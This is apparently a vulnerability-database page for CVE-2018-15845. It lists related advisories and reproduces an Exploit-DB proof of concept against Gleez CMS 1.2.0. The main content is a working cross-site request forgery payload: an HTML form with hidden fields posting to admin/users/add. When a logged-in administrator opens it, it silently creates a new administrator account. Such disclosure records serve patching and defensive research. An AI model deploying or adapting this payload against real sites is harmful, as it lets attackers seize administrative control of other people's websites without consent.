| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin) Vulnerability | 28 Aug 201800:00 | – | zdt | |
| Gleez CMS Cross-Site Request Forgery Vulnerability (CNVD-2018-16531) | 27 Aug 201800:00 | – | cnvd | |
| CVE-2018-15845 | 25 Aug 201821:00 | – | cve | |
| CVE-2018-15845 | 25 Aug 201821:00 | – | cvelist | |
| Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin) | 27 Aug 201800:00 | – | exploitdb | |
| EUVD-2022-3900 | 3 Oct 202520:07 | – | euvd | |
| Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin) | 27 Aug 201800:00 | – | exploitpack | |
| Gleez CMS CSRF Allows Adding of Administrator Accounts | 14 May 202202:20 | – | github | |
| CVE-2018-15845 | 25 Aug 201821:29 | – | nvd | |
| GHSA-G644-X4HJ-CMHQ Gleez CMS CSRF Allows Adding of Administrator Accounts | 14 May 202202:20 | – | osv |
`# Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-24
# Exploit Author: GunEggWang
# Vendor Homepage: https://gleezcms.org/
# Software Link: https://github.com/gleez/cms
# Version: 1.2.0
# CVE : CVE-2018-15845
# Description:
# There is a CSRF vulnerability that can add an administrator account in
# Gleez CMS 1.2.0 via admin/users/add. (https://github.com/gleez/cms/issues/800)
# After the administrator logged in,open the POC,that will create an new admin account unexcused.
# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.gleezcms.org/admin/users/add?0=" method="POST">
<input type="hidden" name="_token" value="18eabd0645699b3eec1686301a684392e8a4735a" />
<input type="hidden" name="_action" value="909998bbc9e60ce40ae378a1055b46f3" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="pass" value="test" />
<input type="hidden" name="nick" value="test" />
<input type="hidden" name="mail" value="[email protected]" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="roles[admin]" value="Administrative user, has access to everything." />
<input type="hidden" name="site_url" value="http://demo.gleezcms.org/" />
<input type="hidden" name="user" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation